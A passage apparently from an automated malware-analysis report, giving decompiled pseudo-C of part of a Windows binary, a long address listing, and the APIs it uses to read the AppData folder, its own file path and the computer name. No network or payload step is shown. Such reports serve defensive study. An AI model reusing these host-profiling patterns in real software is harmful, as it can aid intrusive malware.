                                                                                      																E00402830(_t331,  &_v1136, _t431, _t445, _t449);
                                                                                      																_v8 = 7;
                                                                                      																_v1085 = 0;
                                                                                      																_v1088 = 6;
                                                                                      																_v1085 = 0;
                                                                                      																_v1087 = 0x5c;
                                                                                      																_v1086 = 0x5c;
                                                                                      																_t272 = E00402530( &_v1136,  &_v1087);
                                                                                      																asm("movups xmm0, [eax]");
                                                                                      																asm("movups [ebp-0x484], xmm0");
                                                                                      																asm("movq xmm0, [eax+0x10]");
                                                                                      																asm("movq [ebp-0x474], xmm0");
                                                                                      																 *(_t272 + 0x10) = 0;
                                                                                      																 *(_t272 + 0x14) = 0xf;
                                                                                      																 *_t272 = 0;
                                                                                      																_v8 = 8;
                                                                                      																E004091A0(_t331,  &_v1184, _t445, _v1056,  &_v1160,  &_v1112);
                                                                                      																E00405C60(_t331, "549163\\\\hardz",  &_v1184);
                                                                                      																_t396 = _v1164;
                                                                                      																if(_t396 < 0x10) {
                                                                                      																	L54:
                                                                                      																	_v8 = 7;
                                                                                      																	_t397 = _v1140;
                                                                                      																	if(_t397 < 0x10) {
                                                                                      																		L58:
                                                                                      																		_v8 = 6;
                                                                                      																		_t398 = _v1116;
                                                                                      																		if(_t398 < 0x10) {
                                                                                      																			L62:
                                                                                      																			_v8 = 0;
                                                                                      																			_t399 = _v1092;
                                                                                      																			_v1120 = 0;
                                                                                      																			_v1116 = 0xf;
                                                                                      																			_v1136 = 0;
                                                                                      																			if(_t399 < 0x10) {
                                                                                      																				L66:
                                                                                      																				_t451 =  *0x443acc; // 0x2a
                                                                                      																				_t401 =  >=  ?  *0x443ad4 : 0x443ad4;
                                                                                      																				_t428 =  >=  ?  *0x443abc : 0x443abc;
                                                                                      																				_t520 = _t451 -  *0x443ae4; // 0x37
                                                                                      																				if(_t520 != 0) {
                                                                                      																					L82:
                                                                                      																					E00411470(_t331, _t428);
                                                                                      																				} else {
                                                                                      																					_t452 = _t451 - 4;
                                                                                      																					if(_t452 < 0) {
                                                                                      																						L70:
                                                                                      																						if(_t452 == 0xfffffffc) {
                                                                                      																							goto L79;
                                                                                      																						} else {
                                                                                      																							goto L71;
                                                                                      																						}
                                                                                      																					} else {
                                                                                      																						while( *_t428 ==  *_t401) {
                                                                                      																							_t428 = _t428 + 4;
                                                                                      																							_t401 = _t401 + 4;
                                                                                      																							_t452 = _t452 - 4;
                                                                                      																							if(_t452 >= 0) {
                                                                                      																								continue;
                                                                                      																							} else {
                                                                                      																								goto L70;
                                                                                      																							}
                                                                                      																							goto L80;
                                                                                      																						}
                                                                                      																						L71:
                                                                                      																						_t281 =  *_t428;
                                                                                      																						if(_t281 !=  *_t401) {
                                                                                      																							L78:
                                                                                      																							asm("sbb eax, eax");
                                                                                      																							_t279 = _t281 | 0x00000001;
                                                                                      																						} else {
                                                                                      																							if(_t452 == 0xfffffffd) {
                                                                                      																								L79:
                                                                                      																								_t279 = 0;
                                                                                      																							} else {
                                                                                      																								_t173 = _t428 + 1; // 0xb0000000
                                                                                      																								_t281 =  *_t173;
                                                                                      																								_t174 = _t401 + 1; // 0x70000000
                                                                                      																								if(_t281 !=  *_t174) {
                                                                                      																									goto L78;
                                                                                      																								} else {
                                                                                      																									if(_t452 == 0xfffffffe) {
                                                                                      																										goto L79;
                                                                                      																									} else {
                                                                                      																										_t175 = _t428 + 2; // 0x11b00000
                                                                                      																										_t281 =  *_t175;
                                                                                      																										_t176 = _t401 + 2; // 0x93700000
                                                                                      																										if(_t281 !=  *_t176) {
                                                                                      																											goto L78;
                                                                                      																										} else {
                                                                                      																											if(_t452 == 0xffffffff) {
                                                                                      																												goto L79;
                                                                                      																											} else {
                                                                                      																												_t177 = _t428 + 3; // 0x7f11b000
                                                                                      																												_t281 =  *_t177;
                                                                                      																												_t178 = _t401 + 3; // 0x7f937000
                                                                                      																												if(_t281 ==  *_t178) {
                                                                                      																													goto L79;
                                                                                      																												} else {
                                                                                      																													goto L78;
                                                                                      																												}
                                                                                      																											}
                                                                                      																										}
                                                                                      																									}
                                                                                      																								}
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																					L80:
                                                                                      																					if(_t279 != 0) {
                                                                                      																						goto L82;
                                                                                      																					} else {
                                                                                      																						E00403B40(_t331, _t428, _t445);
                                                                                      																						E00409B10();
                                                                                      																					}
                                                                                      																				}
                                                                                      																				goto L83;
                                                                                      																			} else {
                                                                                      																				_t434 = _v1112;
                                                                                      																				_t402 =  &(_t399->i);
                                                                                      																				_t283 = _v1112;
                                                                                      																				if(_t402 < 0x1000) {
                                                                                      																					L65:
                                                                                      																					_push(_t402);
                                                                                      																					E004138AD(_t434);
                                                                                      																					_t460 = _t460 + 8;
                                                                                      																					goto L66;
                                                                                      																				} else {
                                                                                      																					_t416 =  *((intOrPtr*)(_t283 - 4));
                                                                                      																					_t337 =  &(_t402[8]);
                                                                                      																					if(_t283 -  *((intOrPtr*)(_t283 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																						goto L94;
                                                                                      																					} else {
                                                                                      																						goto L65;
                                                                                      																					}
                                                                                      																				}
                                                                                      																			}
                                                                                      																		} else {
                                                                                      																			_t435 = _v1136;
                                                                                      																			_t403 =  &(_t398->i);
                                                                                      																			_t287 = _v1136;
                                                                                      																			if(_t403 < 0x1000) {
                                                                                      																				L61:
                                                                                      																				_push(_t403);
                                                                                      																				E004138AD(_t435);
                                                                                      																				_t460 = _t460 + 8;
                                                                                      																				goto L62;
                                                                                      																			} else {
                                                                                      																				_t416 =  *((intOrPtr*)(_t287 - 4));
                                                                                      																				_t337 = _t403 + 0x23;
                                                                                      																				if(_t287 -  *((intOrPtr*)(_t287 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																					goto L94;
                                                                                      																				} else {
                                                                                      																					goto L61;
                                                                                      																				}
                                                                                      																			}
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		_t436 = _v1160;
                                                                                      																		_t404 = _t397 + 1;
                                                                                      																		_t291 = _v1160;
                                                                                      																		if(_t404 < 0x1000) {
                                                                                      																			L57:
                                                                                      																			_push(_t404);
                                                                                      																			E004138AD(_t436);
                                                                                      																			_t460 = _t460 + 8;
                                                                                      																			goto L58;
                                                                                      																		} else {
                                                                                      																			_t416 =  *((intOrPtr*)(_t291 - 4));
                                                                                      																			_t337 = _t404 + 0x23;
                                                                                      																			if(_t291 -  *((intOrPtr*)(_t291 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																				goto L94;
                                                                                      																			} else {
                                                                                      																				goto L57;
                                                                                      																			}
                                                                                      																		}
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	_t437 = _v1184;
                                                                                      																	_t405 = _t396 + 1;
                                                                                      																	_t295 = _v1184;
                                                                                      																	if(_t405 < 0x1000) {
                                                                                      																		L53:
                                                                                      																		_push(_t405);
                                                                                      																		E004138AD(_t437);
                                                                                      																		_t460 = _t460 + 8;
                                                                                      																		goto L54;
                                                                                      																	} else {
                                                                                      																		_t416 =  *((intOrPtr*)(_t295 - 4));
                                                                                      																		_t337 = _t405 + 0x23;
                                                                                      																		if(_t295 -  *((intOrPtr*)(_t295 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																			goto L94;
                                                                                      																		} else {
                                                                                      																			goto L53;
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														} else {
                                                                                      															_t428 = _v1160;
                                                                                      															_t406 = _t375 + 1;
                                                                                      															_t299 = _v1160;
                                                                                      															if(_t406 < 0x1000) {
                                                                                      																L42:
                                                                                      																_push(_t406);
                                                                                      																E004138AD(_t428);
                                                                                      																_t460 = _t460 + 8;
                                                                                      																goto L43;
                                                                                      															} else {
                                                                                      																_t416 =  *((intOrPtr*)(_t299 - 4));
                                                                                      																_t337 = _t406 + 0x23;
                                                                                      																if(_t299 -  *((intOrPtr*)(_t299 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																	goto L93;
                                                                                      																} else {
                                                                                      																	goto L42;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t428 = _v1112;
                                                                                      														_t407 =  &(_t374->i);
                                                                                      														_t303 = _v1112;
                                                                                      														if(_t407 < 0x1000) {
                                                                                      															L38:
                                                                                      															_push(_t407);
                                                                                      															E004138AD(_t428);
                                                                                      															_t460 = _t460 + 8;
                                                                                      															goto L39;
                                                                                      														} else {
                                                                                      															_t416 =  *((intOrPtr*)(_t303 - 4));
                                                                                      															_t337 = _t407 + 0x23;
                                                                                      															if(_t303 -  *((intOrPtr*)(_t303 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																goto L93;
                                                                                      															} else {
                                                                                      																goto L38;
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      												} else {
                                                                                      													_t428 = _v1136;
                                                                                      													_t408 =  &(_t373->i);
                                                                                      													_t307 = _v1136;
                                                                                      													if(_t408 < 0x1000) {
                                                                                      														L34:
                                                                                      														_push(_t408);
                                                                                      														E004138AD(_t428);
                                                                                      														_t460 = _t460 + 8;
                                                                                      														goto L35;
                                                                                      													} else {
                                                                                      														_t416 =  *((intOrPtr*)(_t307 - 4));
                                                                                      														_t337 = _t408 + 0x23;
                                                                                      														if(_t307 -  *((intOrPtr*)(_t307 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      															goto L93;
                                                                                      														} else {
                                                                                      															goto L34;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										} else {
                                                                                      											_t438 = _v1160;
                                                                                      											_t409 = _t359 + 1;
                                                                                      											_t311 = _v1160;
                                                                                      											if(_t409 < 0x1000) {
                                                                                      												L27:
                                                                                      												_push(_t409);
                                                                                      												E004138AD(_t438);
                                                                                      												_t459 = _t459 + 8;
                                                                                      												goto L28;
                                                                                      											} else {
                                                                                      												_t416 =  *((intOrPtr*)(_t311 - 4));
                                                                                      												_t337 = _t409 + 0x23;
                                                                                      												if(_t311 -  *((intOrPtr*)(_t311 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      													goto L91;
                                                                                      												} else {
                                                                                      													goto L27;
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t439 = _v1112;
                                                                                      										_t410 =  &(_t358->i);
                                                                                      										_t315 = _v1112;
                                                                                      										if(_t410 < 0x1000) {
                                                                                      											L23:
                                                                                      											_push(_t410);
                                                                                      											E004138AD(_t439);
                                                                                      											_t459 = _t459 + 8;
                                                                                      											goto L24;
                                                                                      										} else {
                                                                                      											_t416 =  *((intOrPtr*)(_t315 - 4));
                                                                                      											_t337 = _t410 + 0x23;
                                                                                      											if(_t315 -  *((intOrPtr*)(_t315 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      												goto L91;
                                                                                      											} else {
                                                                                      												goto L23;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t440 = _v1136;
                                                                                      									_t411 =  &(_t357->i);
                                                                                      									_t319 = _v1136;
                                                                                      									if(_t411 < 0x1000) {
                                                                                      										L19:
                                                                                      										_push(_t411);
                                                                                      										E004138AD(_t440);
                                                                                      										_t459 = _t459 + 8;
                                                                                      										goto L20;
                                                                                      									} else {
                                                                                      										_t416 =  *((intOrPtr*)(_t319 - 4));
                                                                                      										_t337 = _t411 + 0x23;
                                                                                      										if(_t319 -  *((intOrPtr*)(_t319 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      											goto L91;
                                                                                      										} else {
                                                                                      											goto L19;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t441 = _v1160;
                                                                                      							_t412 = _t343 + 1;
                                                                                      							_t323 = _v1160;
                                                                                      							if(_t412 < 0x1000) {
                                                                                      								L12:
                                                                                      								_push(_t412);
                                                                                      								E004138AD(_t441);
                                                                                      								_t458 = _t458 + 8;
                                                                                      								goto L13;
                                                                                      							} else {
                                                                                      								_t416 =  *((intOrPtr*)(_t323 - 4));
                                                                                      								_t337 = _t412 + 0x23;
                                                                                      								if(_t323 -  *((intOrPtr*)(_t323 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      									goto L89;
                                                                                      								} else {
                                                                                      									goto L12;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t442 = _v1112;
                                                                                      						_t413 =  &(_t342->i);
                                                                                      						_t327 = _v1112;
                                                                                      						if(_t413 < 0x1000) {
                                                                                      							L8:
                                                                                      							_push(_t413);
                                                                                      							E004138AD(_t442);
                                                                                      							_t458 = _t458 + 8;
                                                                                      							goto L9;
                                                                                      						} else {
                                                                                      							_t416 =  *((intOrPtr*)(_t327 - 4));
                                                                                      							_t337 = _t413 + 0x23;
                                                                                      							if(_t327 -  *((intOrPtr*)(_t327 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      								L89:
                                                                                      								E0041805F(_t331, _t337, _t416);
                                                                                      								L90:
                                                                                      								E00401BD0(_t331, _t337, _t416);
                                                                                      								L91:
                                                                                      								E0041805F(_t331, _t337, _t416);
                                                                                      								L92:
                                                                                      								E00401BD0(_t331, _t337, _t416);
                                                                                      								L93:
                                                                                      								E0041805F(_t331, _t337, _t416);
                                                                                      								L94:
                                                                                      								E0041805F(_t331, _t337, _t416);
                                                                                      								L95:
                                                                                      								E0041805F(_t331, _t337, _t416);
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t337 - 0x18)) + 4)) + _t337 - 0x18)) = 0x43ea88;
                                                                                      								_t189 =  *((intOrPtr*)(_t337 - 0x18)) + 4; // 0x43fa70
                                                                                      								_t190 =  *_t189 - 0x18; // 0x43fa58
                                                                                      								_t217 = _t190;
                                                                                      								 *((intOrPtr*)( *_t189 + _t337 - 0x1c)) = _t217;
                                                                                      								return _t217;
                                                                                      							} else {
                                                                                      								goto L8;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}





















































































































                                                                                      0x004041d0
                                                                                      0x004041d1
                                                                                      0x004041e1
                                                                                      0x004041e7
                                                                                      0x004041ec
                                                                                      0x004041ee
                                                                                      0x004041f7
                                                                                      0x0040420c
                                                                                      0x00404212
                                                                                      0x00404215
                                                                                      0x0040421f
                                                                                      0x00404225
                                                                                      0x0040422f
                                                                                      0x00404236
                                                                                      0x00404240
                                                                                      0x00404240
                                                                                      0x00404242
                                                                                      0x00404243
                                                                                      0x0040424f
                                                                                      0x00404250
                                                                                      0x00404257
                                                                                      0x0040425e
                                                                                      0x00404267
                                                                                      0x0040426f
                                                                                      0x00404276
                                                                                      0x0040427c
                                                                                      0x00404282
                                                                                      0x00404289
                                                                                      0x00404290
                                                                                      0x00404290
                                                                                      0x00404292
                                                                                      0x00404293
                                                                                      0x0040429c
                                                                                      0x0040429e
                                                                                      0x004042aa
                                                                                      0x00404b24
                                                                                      0x00000000
                                                                                      0x004042b0
                                                                                      0x004042be
                                                                                      0x004042db
                                                                                      0x004042eb
                                                                                      0x004042f5
                                                                                      0x004042fa
                                                                                      0x00404303
                                                                                      0x00404308
                                                                                      0x00404311
                                                                                      0x00404342
                                                                                      0x00404342
                                                                                      0x00404346
                                                                                      0x0040434c
                                                                                      0x00404356
                                                                                      0x00404360
                                                                                      0x0040436a
                                                                                      0x0040439b
                                                                                      0x0040439b
                                                                                      0x004043a5
                                                                                      0x004043ad
                                                                                      0x004043b4
                                                                                      0x004043ba
                                                                                      0x004043c0
                                                                                      0x004043c7
                                                                                      0x004043ca
                                                                                      0x004043d0
                                                                                      0x004043d0
                                                                                      0x004043d2
                                                                                      0x004043d3
                                                                                      0x004043d9
                                                                                      0x004043df
                                                                                      0x00000000
                                                                                      0x004043e5
                                                                                      0x004043f2
                                                                                      0x0040440f
                                                                                      0x0040441f
                                                                                      0x00404429
                                                                                      0x0040442e
                                                                                      0x00404431
                                                                                      0x00404437
                                                                                      0x00404448
                                                                                      0x00404456
                                                                                      0x00404458
                                                                                      0x00404461
                                                                                      0x00404467
                                                                                      0x00404469
                                                                                      0x00404475
                                                                                      0x0040447e
                                                                                      0x00404485
                                                                                      0x0040448f
                                                                                      0x00404492
                                                                                      0x00404499
                                                                                      0x0040449e
                                                                                      0x004044a5
                                                                                      0x004044ac
                                                                                      0x004044b6
                                                                                      0x004044be
                                                                                      0x004044c3
                                                                                      0x004044cc
                                                                                      0x004044fd
                                                                                      0x004044fd
                                                                                      0x00404501
                                                                                      0x0040450a
                                                                                      0x0040453b
                                                                                      0x0040453b
                                                                                      0x0040453f
                                                                                      0x00404545
                                                                                      0x0040454f
                                                                                      0x00404559
                                                                                      0x00404563
                                                                                      0x00404594
                                                                                      0x00404594
                                                                                      0x0040459e
                                                                                      0x004045a6
                                                                                      0x004045ad
                                                                                      0x004045b3
                                                                                      0x004045b9
                                                                                      0x004045c0
                                                                                      0x004045c3
                                                                                      0x004045c3
                                                                                      0x004045c5
                                                                                      0x004045c6
                                                                                      0x004045ca
                                                                                      0x004045cc
                                                                                      0x004045d0
                                                                                      0x00000000
                                                                                      0x004045d6
                                                                                      0x004045e3
                                                                                      0x00404600
                                                                                      0x00404610
                                                                                      0x0040461a
                                                                                      0x0040461f
                                                                                      0x00404622
                                                                                      0x00404628
                                                                                      0x00404639
                                                                                      0x00404647
                                                                                      0x00404649
                                                                                      0x00404652
                                                                                      0x00404658
                                                                                      0x0040465a
                                                                                      0x00404666
                                                                                      0x0040466f
                                                                                      0x00404676
                                                                                      0x00404680
                                                                                      0x00404683
                                                                                      0x0040468a
                                                                                      0x0040468f
                                                                                      0x00404696
                                                                                      0x0040469d
                                                                                      0x004046a7
                                                                                      0x004046af
                                                                                      0x004046b4
                                                                                      0x004046bd
                                                                                      0x004046ee
                                                                                      0x004046ee
                                                                                      0x004046f2
                                                                                      0x004046fb
                                                                                      0x0040472c
                                                                                      0x0040472c
                                                                                      0x00404730
                                                                                      0x00404736
                                                                                      0x00404740
                                                                                      0x0040474a
                                                                                      0x00404754
                                                                                      0x00404785
                                                                                      0x0040478c
                                                                                      0x00404ad1
                                                                                      0x00404ad1
                                                                                      0x00404ada
                                                                                      0x00404b07
                                                                                      0x00404b0c
                                                                                      0x00404b14
                                                                                      0x00404b15
                                                                                      0x00404b23
                                                                                      0x00404adc
                                                                                      0x00404adc
                                                                                      0x00404ae2
                                                                                      0x00404ae3
                                                                                      0x00404aeb
                                                                                      0x00404afd
                                                                                      0x00404afd
                                                                                      0x00404aff
                                                                                      0x00000000
                                                                                      0x00404aed
                                                                                      0x00404aed
                                                                                      0x00404af0
                                                                                      0x00404afb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404afb
                                                                                      0x00404aeb
                                                                                      0x00404792
                                                                                      0x004047a0
                                                                                      0x004047a6
                                                                                      0x004047ac
                                                                                      0x004047b0
                                                                                      0x004047b0
                                                                                      0x004047b2
                                                                                      0x004047b3
                                                                                      0x004047c6
                                                                                      0x004047d1
                                                                                      0x004047e3
                                                                                      0x004047f7
                                                                                      0x004047fd
                                                                                      0x00404800
                                                                                      0x0040480a
                                                                                      0x00404810
                                                                                      0x0040481a
                                                                                      0x00404821
                                                                                      0x00404824
                                                                                      0x00404824
                                                                                      0x00404826
                                                                                      0x00404827
                                                                                      0x00404833
                                                                                      0x00404834
                                                                                      0x0040483b
                                                                                      0x00404840
                                                                                      0x00404844
                                                                                      0x0040484a
                                                                                      0x0040484d
                                                                                      0x00404857
                                                                                      0x0040485e
                                                                                      0x00404868
                                                                                      0x00404870
                                                                                      0x00404870
                                                                                      0x00404872
                                                                                      0x00404873
                                                                                      0x0040487f
                                                                                      0x00404880
                                                                                      0x00404887
                                                                                      0x0040488e
                                                                                      0x00404894
                                                                                      0x0040489d
                                                                                      0x004048a5
                                                                                      0x004048ae
                                                                                      0x004048ba
                                                                                      0x004048c7
                                                                                      0x004048cc
                                                                                      0x004048cf
                                                                                      0x004048d6
                                                                                      0x004048db
                                                                                      0x004048e3
                                                                                      0x004048ea
                                                                                      0x004048f1
                                                                                      0x004048fa
                                                                                      0x00404912
                                                                                      0x00404923
                                                                                      0x00404928
                                                                                      0x00404931
                                                                                      0x00404962
                                                                                      0x00404962
                                                                                      0x00404966
                                                                                      0x0040496f
                                                                                      0x004049a0
                                                                                      0x004049a0
                                                                                      0x004049a4
                                                                                      0x004049ad
                                                                                      0x004049de
                                                                                      0x004049de
                                                                                      0x004049e2
                                                                                      0x004049e8
                                                                                      0x004049f2
                                                                                      0x004049fc
                                                                                      0x00404a06
                                                                                      0x00404a37
                                                                                      0x00404a43
                                                                                      0x00404a4e
                                                                                      0x00404a5c
                                                                                      0x00404a63
                                                                                      0x00404a69
                                                                                      0x00404acc
                                                                                      0x00404acc
                                                                                      0x00404a6b
                                                                                      0x00404a6b
                                                                                      0x00404a6e
                                                                                      0x00404a81
                                                                                      0x00404a84
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a70
                                                                                      0x00404a70
                                                                                      0x00404a76
                                                                                      0x00404a79
                                                                                      0x00404a7c
                                                                                      0x00404a7f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a7f
                                                                                      0x00404a86
                                                                                      0x00404a86
                                                                                      0x00404a8a
                                                                                      0x00404ab3
                                                                                      0x00404ab3
                                                                                      0x00404ab5
                                                                                      0x00404a8c
                                                                                      0x00404a8f
                                                                                      0x00404aba
                                                                                      0x00404aba
                                                                                      0x00404a91
                                                                                      0x00404a91
                                                                                      0x00404a91
                                                                                      0x00404a94
                                                                                      0x00404a97
                                                                                      0x00000000
                                                                                      0x00404a99
                                                                                      0x00404a9c
                                                                                      0x00000000
                                                                                      0x00404a9e
                                                                                      0x00404a9e
                                                                                      0x00404a9e
                                                                                      0x00404aa1
                                                                                      0x00404aa4
                                                                                      0x00000000
                                                                                      0x00404aa6
                                                                                      0x00404aa9
                                                                                      0x00000000
                                                                                      0x00404aab
                                                                                      0x00404aab
                                                                                      0x00404aab
                                                                                      0x00404aae
                                                                                      0x00404ab1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404ab1
                                                                                      0x00404aa9
                                                                                      0x00404aa4
                                                                                      0x00404a9c
                                                                                      0x00404a97
                                                                                      0x00404a8f
                                                                                      0x00404a8a
                                                                                      0x00404abc
                                                                                      0x00404abe
                                                                                      0x00000000
                                                                                      0x00404ac0
                                                                                      0x00404ac0
                                                                                      0x00404ac5
                                                                                      0x00404ac5
                                                                                      0x00404abe
                                                                                      0x00000000
                                                                                      0x00404a08
                                                                                      0x00404a08
                                                                                      0x00404a0e
                                                                                      0x00404a0f
                                                                                      0x00404a17
                                                                                      0x00404a2d
                                                                                      0x00404a2d
                                                                                      0x00404a2f
                                                                                      0x00404a34
                                                                                      0x00000000
                                                                                      0x00404a19
                                                                                      0x00404a19
                                                                                      0x00404a1c
                                                                                      0x00404a27
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a27
                                                                                      0x00404a17
                                                                                      0x004049af
                                                                                      0x004049af
                                                                                      0x004049b5
                                                                                      0x004049b6
                                                                                      0x004049be
                                                                                      0x004049d4
                                                                                      0x004049d4
                                                                                      0x004049d6
                                                                                      0x004049db
                                                                                      0x00000000
                                                                                      0x004049c0
                                                                                      0x004049c0
                                                                                      0x004049c3
                                                                                      0x004049ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004049ce
                                                                                      0x004049be
                                                                                      0x00404971
                                                                                      0x00404971
                                                                                      0x00404977
                                                                                      0x00404978
                                                                                      0x00404980
                                                                                      0x00404996
                                                                                      0x00404996
                                                                                      0x00404998
                                                                                      0x0040499d
                                                                                      0x00000000
                                                                                      0x00404982
                                                                                      0x00404982
                                                                                      0x00404985
                                                                                      0x00404990
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404990
                                                                                      0x00404980
                                                                                      0x00404933
                                                                                      0x00404933
                                                                                      0x00404939
                                                                                      0x0040493a
                                                                                      0x00404942
                                                                                      0x00404958
                                                                                      0x00404958
                                                                                      0x0040495a
                                                                                      0x0040495f
                                                                                      0x00000000
                                                                                      0x00404944
                                                                                      0x00404944
                                                                                      0x00404947
                                                                                      0x00404952
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404952
                                                                                      0x00404942
                                                                                      0x00404931
                                                                                      0x00404756
                                                                                      0x00404756
                                                                                      0x0040475c
                                                                                      0x0040475d
                                                                                      0x00404765
                                                                                      0x0040477b
                                                                                      0x0040477b
                                                                                      0x0040477d
                                                                                      0x00404782
                                                                                      0x00000000
                                                                                      0x00404767
                                                                                      0x00404767
                                                                                      0x0040476a
                                                                                      0x00404775
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404775
                                                                                      0x00404765
                                                                                      0x004046fd
                                                                                      0x004046fd
                                                                                      0x00404703
                                                                                      0x00404704
                                                                                      0x0040470c
                                                                                      0x00404722
                                                                                      0x00404722
                                                                                      0x00404724
                                                                                      0x00404729
                                                                                      0x00000000
                                                                                      0x0040470e
                                                                                      0x0040470e
                                                                                      0x00404711
                                                                                      0x0040471c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040471c
                                                                                      0x0040470c
                                                                                      0x004046bf
                                                                                      0x004046bf
                                                                                      0x004046c5
                                                                                      0x004046c6
                                                                                      0x004046ce
                                                                                      0x004046e4
                                                                                      0x004046e4
                                                                                      0x004046e6
                                                                                      0x004046eb
                                                                                      0x00000000
                                                                                      0x004046d0
                                                                                      0x004046d0
                                                                                      0x004046d3
                                                                                      0x004046de
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004046de
                                                                                      0x004046ce
                                                                                      0x004046bd
                                                                                      0x00404565
                                                                                      0x00404565
                                                                                      0x0040456b
                                                                                      0x0040456c
                                                                                      0x00404574
                                                                                      0x0040458a
                                                                                      0x0040458a
                                                                                      0x0040458c
                                                                                      0x00404591
                                                                                      0x00000000
                                                                                      0x00404576
                                                                                      0x00404576
                                                                                      0x00404579
                                                                                      0x00404584
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404584
                                                                                      0x00404574
                                                                                      0x0040450c
                                                                                      0x0040450c
                                                                                      0x00404512
                                                                                      0x00404513
                                                                                      0x0040451b
                                                                                      0x00404531
                                                                                      0x00404531
                                                                                      0x00404533
                                                                                      0x00404538
                                                                                      0x00000000
                                                                                      0x0040451d
                                                                                      0x0040451d
                                                                                      0x00404520
                                                                                      0x0040452b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040452b
                                                                                      0x0040451b
                                                                                      0x004044ce
                                                                                      0x004044ce
                                                                                      0x004044d4
                                                                                      0x004044d5
                                                                                      0x004044dd
                                                                                      0x004044f3
                                                                                      0x004044f3
                                                                                      0x004044f5
                                                                                      0x004044fa
                                                                                      0x00000000
                                                                                      0x004044df
                                                                                      0x004044df
                                                                                      0x004044e2
                                                                                      0x004044ed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004044ed
                                                                                      0x004044dd
                                                                                      0x004044cc
                                                                                      0x0040436c
                                                                                      0x0040436c
                                                                                      0x00404372
                                                                                      0x00404373
                                                                                      0x0040437b
                                                                                      0x00404391
                                                                                      0x00404391
                                                                                      0x00404393
                                                                                      0x00404398
                                                                                      0x00000000
                                                                                      0x0040437d
                                                                                      0x0040437d
                                                                                      0x00404380
                                                                                      0x0040438b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040438b
                                                                                      0x0040437b
                                                                                      0x00404313
                                                                                      0x00404313
                                                                                      0x00404319
                                                                                      0x0040431a
                                                                                      0x00404322
                                                                                      0x00404338
                                                                                      0x00404338
                                                                                      0x0040433a
                                                                                      0x0040433f
                                                                                      0x00000000
                                                                                      0x00404324
                                                                                      0x00404324
                                                                                      0x00404327
                                                                                      0x00404332
                                                                                      0x00404b29
                                                                                      0x00404b29
                                                                                      0x00404b2e
                                                                                      0x00404b2e
                                                                                      0x00404b33
                                                                                      0x00404b33
                                                                                      0x00404b38
                                                                                      0x00404b38
                                                                                      0x00404b3d
                                                                                      0x00404b3d
                                                                                      0x00404b42
                                                                                      0x00404b42
                                                                                      0x00404b47
                                                                                      0x00404b47
                                                                                      0x00404b4c
                                                                                      0x00404b4d
                                                                                      0x00404b4e
                                                                                      0x00404b4f
                                                                                      0x00404b56
                                                                                      0x00404b61
                                                                                      0x00404b64
                                                                                      0x00404b64
                                                                                      0x00404b67
                                                                                      0x00404b6b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404332
                                                                                      0x00404322
                                                                                      0x00404311

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,9900EC21), ref: 0040420C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 004047A0
                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 004047E3
